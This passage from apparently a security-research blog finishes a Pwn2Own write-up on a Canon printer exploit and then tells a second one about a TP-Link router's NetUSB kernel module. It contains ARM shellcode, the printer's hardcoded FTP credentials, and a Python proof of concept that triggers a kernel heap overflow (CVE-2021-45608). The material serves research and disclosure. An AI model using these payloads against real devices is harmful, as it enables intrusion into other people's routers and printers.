movt r12, #0x4185
blx r12


The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it, either to access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="192.168.1.100", user="guest", passwd="welcome.") as ftp:
    # storbinary expects a file object opened in binary mode
    with open("image.raw", "rb") as f:
        ftp.storbinary("STOR a", f)


File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end


The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
.loop:
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
sub r4, r4, r0
cmp r4, #0
bgt .loop
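The size computed by the payload (width x height x depth) is also the size the uploaded file should have. As a hedged sketch, a test image of the right size could be generated as follows; we assume 3 bytes per pixel in R, G, B order, stored row by row, which is our reading of "RGB image" and of the depth of 3 used above rather than something we can confirm here.

```python
WIDTH, HEIGHT, DEPTH = 320, 240, 3
IMAGE_SIZE = WIDTH * HEIGHT * DEPTH  # number of bytes the read loop expects


def solid_image(red, green, blue):
    """Return a raw image where every pixel has the same colour (assumed RGB order)."""
    return bytes((red, green, blue)) * (WIDTH * HEIGHT)


if __name__ == "__main__":
    data = solid_image(255, 0, 0)
    with open("image.raw", "wb") as f:
        f.write(data)
    print(len(data))
```

A file shorter than this makes the read loop stop early, leaving part of the original debug image in the buffer.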


For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12


Putting everything together

In the end, our exploit is split into 3 parts:

1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
2. Upload our image using FTP,
3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit.zip and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...

Patch

Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.

Conclusion

In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

26 March 2022 at 15:00

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on Discord. The end goal for us is to participate in the contest and, after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them and the hardware was easy and cheap to get, so it felt like the right choice.

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low-hanging fruit and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended ordering an FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and got to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new ground to lower the chance of entering the competition with a duplicate and also maximize my chances of finding something that would allow me to enter the competition. But before thinking about duplicates, I needed a bug.

I started to do some very basic attack surface enumeration: running processes, iptables rules, listening sockets, crontabs, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq


At first sight, the following processes looked interesting:

• the uhttpd HTTP server,
• the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?),
• the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to find out whether dnsmasq was properly patched against the vulns that have been published in the past years. From the source, it looked like some vulns weren't patched, but the disassembly showed otherwise 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -


Why is there no process name associated with those sockets uh 🤔? Well, after googling and looking around, it turns out that those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.
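
Spotting such sockets can be automated. The following is a minimal sketch, assuming the busybox netstat column layout shown above (owner in the last column); the `ownerless_listeners` helper is hypothetical and simply reports every socket whose owner column is `-`.

```python
def ownerless_listeners(netstat_output):
    """Return (proto, local_address) for sockets whose PID/Program column is '-'."""
    hits = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Skip headers and anything that is not a tcp/udp socket line.
        if len(fields) < 6 or fields[0] not in ('tcp', 'udp'):
            continue
        if fields[-1] == '-':
            hits.append((fields[0], fields[3]))
    return hits

sample = """Active Internet connections (servers and established)
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
"""
suspects = ownerless_listeners(sample)
```

On the output above this also flags the UDP socket on port 54480, which has no owning process either.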

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker input is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
    // ...
    result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
    if(result) {
        v64[0] = _bswapw(v64[0]);                     // <-- attacker controlled
        Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0);  // <-- overflow
        // ...


I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
    if(SbusConnection)
        if(Buffer) {
            if(BufferLen) {
                while (1) {
                    GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
                    if ( GetLen <= 0 )
                        break;
                    BufferLen -= GetLen;
                    Buffer = (char *)Buffer + GetLen;
                    if ( !BufferLen )
                        return 1;
                }
                kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
                return 0;
            }
            else {
                return 1;
            }
        } else {
            // ...
            return 0;
        }
    }
    else {
        // ...
        return 0;
    }
}


KTCP_get is basically a wrapper around ks_recv, which means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES  # provided by e.g. pycryptodome
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
    # Version
    s.send(b'\x56\x04')
    # Send random data
    s.send(aes_ctx.encrypt(b'a' * 16))
    _ = s.recv(16)
    # Receive & send back the random numbers.
    challenge = s.recv(16)
    s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
    length = len(name)
    assert length - 1 < 63
    s.send(le32(length))
    b = name
    if type(name) == str:
        b = bytes(name, 'ascii')
    s.send(b)

def create_connection(target, port, name):
    second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
    send_handshake(s, aes_ctx)
    send_bus_name(s, name)
    return s, aes_ctx

def main():
    parser = argparse.ArgumentParser('Zenith PoC2')
    # The target address is read from the command line.
    parser.add_argument('--target', required=True)
    args = parser.parse_args()
    s, _ = create_connection(args.target, netusb_port, 'PoC2')
    s.send(le8(0xff))
    s.send(le8(0x21))
    # Length field: 0xffffffff + 9 wraps around to 8 in the driver.
    s.send(le32(0xff_ff_ff_ff))
    # Far more data than the small allocation can hold.
    p = b'\xab' * (0x1_000 * 100)
    s.send(p)

if __name__ == '__main__':
    main()


Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into __get_free_pages which is part of the Linux kernel. __get_free_pages allocates 2**n pages, and is implemented using what is called a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke __get_free_pages.
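
The arithmetic behind that interval is easy to check. The sketch below models the 32-bit wrap of `length + 9` and a simplified order computation; `requested_size` and `page_order` are hypothetical helpers, and `page_order` assumes that any size up to one 0x1000-byte page (including 0) is served by an order 0 block, which may differ from what mallocPageBuf actually does for a zero size.

```python
PAGE_SIZE = 0x1000
U32_MASK = 0xFFFFFFFF

def requested_size(length):
    """Size handed to the allocator: length + 9, truncated to 32 bits."""
    return (length + 9) & U32_MASK

def page_order(size):
    """Smallest n such that PAGE_SIZE * 2**n bytes can hold `size` bytes."""
    order = 0
    while (PAGE_SIZE << order) < size:
        order += 1
    return order

# The nine length values for which the addition wraps around.
wrapped = {length: requested_size(length) for length in range(0xFFFFFFF7, 0x100000000)}
```

Every wrapping length ends up in a single order 0 page, while the subsequent read is still driven by the huge attacker-supplied length.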

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
    // ...
    v1 = vsprintf(v6, a1);
    v2 = v1 < 257;
    v3 = v1 + 1;
    if(!v2) {
        v6[256] = 0;
        v3 = 257;
    }
    v5 = v3;
    kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
    return printk("<1>%s", v6);
}


Pretty funny right?
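
A client on the receiving end could split that stream back into messages and pull out anything that looks like a kernel pointer. This is only a sketch: the framing (a 4-byte length followed by the NUL-terminated string) is inferred from the decompiled snippet above, the big-endian byte order is an assumption, and `split_frames` / `leaked_addresses` are hypothetical helpers rather than code from the exploit.

```python
import re
import struct

def split_frames(data, byteorder='>'):
    """Split a byte stream of [u32 length][string] records into messages."""
    frames, offset = [], 0
    while offset + 4 <= len(data):
        (length,) = struct.unpack_from(byteorder + 'I', data, offset)
        if offset + 4 + length > len(data):
            break  # incomplete record, wait for more data
        raw = data[offset + 4:offset + 4 + length]
        frames.append(raw.rstrip(b'\x00').decode('ascii', 'replace'))
        offset += 4 + length
    return frames

HEX_WORD = re.compile(r'\b[0-9a-fA-F]{8}\b')

def leaked_addresses(message):
    """Return 8-digit hex words that fall in the upper half of the address space."""
    values = (int(word, 16) for word in HEX_WORD.findall(message))
    return [value for value in values if value >= 0x80000000]

message = b'INFO16EC: infomap 869c6e38\n\x00'
stream = struct.pack('>I', len(message)) + message
frames = split_frames(stream * 2)
```

The `>= 0x80000000` filter is a crude heuristic for kernel addresses on a 32-bit MIPS target; it drops values such as version numbers that merely look like hex.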

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspection wasn't going to work. What were my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I ended up with a bootable image that had a configuration as close as possible to the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
    // ...
#ifdef CONFIG_WIRELESS_EXT
    /* List of functions to handle Wireless Extensions (instead of ioctl).
     * See <net/iw_handler.h> for details. Jean II */
    const struct iw_handler_def * wireless_handlers;
    /* Instance data managed by the core of Wireless Extensions. */
    struct iw_public_data * wireless_data;
#endif
    // ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
    struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
    struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
    // ...
#ifdef CONFIG_SYSFS
    struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
    struct netdev_rx_queue  *_rx;

    /* Number of RX queues allocated at register_netdev() time */
    unsigned int    num_rx_queues;

    /* Number of RX queues currently active in device */
    unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
    /* CPU reverse-mapping for RX completion interrupts, indexed
     * by RX queue number.  Assigned by driver.  This must only be
     * set if the ndo_rx_flow_steer operation is defined. */
    struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
    //...
};
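
To make the effect concrete, here is a toy model of the problem using ctypes. It is a sketch under loud assumptions: the structure is a drastically shortened, hypothetical stand-in for net_device, pointers are modelled as 32-bit integers to mimic a MIPS32 target, and the `name` and `mtu` fields are only there to give the optional fields something to sit between.

```python
import ctypes

def make_net_device(wireless_ext, vlan_8021q):
    """Build a toy structure whose layout depends on two 'config options'."""
    fields = [('name', ctypes.c_char * 16)]
    if wireless_ext:    # stands in for CONFIG_WIRELESS_EXT
        fields += [('wireless_handlers', ctypes.c_uint32),
                   ('wireless_data', ctypes.c_uint32)]
    if vlan_8021q:      # stands in for CONFIG_VLAN_8021Q
        fields.append(('vlan_info', ctypes.c_uint32))
    fields.append(('mtu', ctypes.c_uint32))

    class NetDevice(ctypes.Structure):
        _fields_ = fields

    return NetDevice

driver_view = make_net_device(wireless_ext=True, vlan_8021q=True)
kernel_view = make_net_device(wireless_ext=False, vlan_8021q=False)
```

A driver compiled against `driver_view` reads `mtu` at `driver_view.mtu.offset`, while a kernel built with both options off stores it at `kernel_view.mtu.offset`; every access past the first optional field lands on the wrong bytes.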


Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could compare the kernel configuration of my bootable QEMU image with the one of the kernel I had built from the GPL archive and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile and hope that it didn't make the kernel unbootable under QEMU.
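
Comparing two kernel configurations for a handful of options can be scripted. The sketch below assumes the standard .config syntax (`CONFIG_X=y` and `# CONFIG_X is not set`); `parse_kconfig` and `config_mismatches` are hypothetical helpers, and the two sample configurations are made up.

```python
def parse_kconfig(text):
    """Parse .config text into {option: value}; unset options map to 'n'."""
    options = {}
    suffix = ' is not set'
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('CONFIG_') and '=' in line:
            name, value = line.split('=', 1)
            options[name] = value
        elif line.startswith('# CONFIG_') and line.endswith(suffix):
            options[line[2:-len(suffix)]] = 'n'
    return options

def config_mismatches(first, second, watched):
    """Return {option: (value_in_first, value_in_second)} for differing options."""
    a, b = parse_kconfig(first), parse_kconfig(second)
    return {name: (a.get(name, 'n'), b.get(name, 'n'))
            for name in watched
            if a.get(name, 'n') != b.get(name, 'n')}

qemu_config = "CONFIG_SYSFS=y\n# CONFIG_RPS is not set\nCONFIG_VLAN_8021Q=m\n"
device_config = "CONFIG_SYSFS=y\nCONFIG_RPS=y\n# CONFIG_VLAN_8021Q is not set\n"
diff = config_mismatches(qemu_config, device_config,
                         ['CONFIG_SYSFS', 'CONFIG_RPS', 'CONFIG_VLAN_8021Q'])
```

Feeding it the options guarding the structure involved in a crash narrows down which flags are worth flipping before the next rebuild.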

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
~# ./start.sh
[ 89.092000] new slab @ 86964000
[ 89.108000] kcg 333 :GPL NetUSB up!
[ 89.240000] NetUSB: module license 'Proprietary' taints kernel.
[ 89.240000] Disabling lock debugging due to kernel taint
[ 89.268000] kc 90 : run_telnetDBGDServer start
[ 89.272000] kc 227 : init_DebugD end
[ 89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[ 89.272000] INFO17FA: 7437: Archer C7 :Archer C7
[ 89.272000] INFO17FB: AUTH ISOC
[ 89.272000] INFO17FC: filterAudio
[ 89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[ 89.276000] INFO0145: init proc : PAGE_SIZE 4096
[ 89.280000] INFO16EC: infomap 869c6e38
[ 89.280000] INFO16EF: sleep to wait eth0 to wake up
[ 89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
~# [ 92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones):

• I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM, chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close to reproducing it.
• I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
• You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could now be used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.
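
The splitting behaviour this strategy relies on can be pictured with a toy model. The `ToyBuddy` class below is hypothetical and heavily simplified (no coalescing on free, free lists handed in by the caller, made-up addresses); it is not the kernel's implementation, only an illustration of why draining order 0 yields two adjacent pages.

```python
PAGE = 0x1000

class ToyBuddy:
    """Toy binary buddy allocator: free lists indexed by order, no coalescing."""

    def __init__(self, free_lists):
        self.free = {order: sorted(blocks) for order, blocks in free_lists.items()}

    def alloc(self, order):
        # Take a block from the smallest order that can satisfy the request.
        for current in sorted(self.free):
            if current >= order and self.free[current]:
                base = self.free[current].pop(0)
                # Split the block down, returning each upper half to its freelist.
                while current > order:
                    current -= 1
                    self.free.setdefault(current, []).append(base + (PAGE << current))
                return base
        raise MemoryError('no free block large enough')

# One lonely order 0 page and one order 1 block (two contiguous pages).
allocator = ToyBuddy({0: [0x5000], 1: [0x8000]})
drained = allocator.alloc(0)   # empties the order 0 freelist
first = allocator.alloc(0)     # forces the order 1 block to be split
second = allocator.alloc(0)    # gets the other half of that block
```

In this model the last two allocations are physically adjacent, which is the layout needed to have an overflowable page sit right before a page used for something else.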

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
    // ...
    case 0x50:
        AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
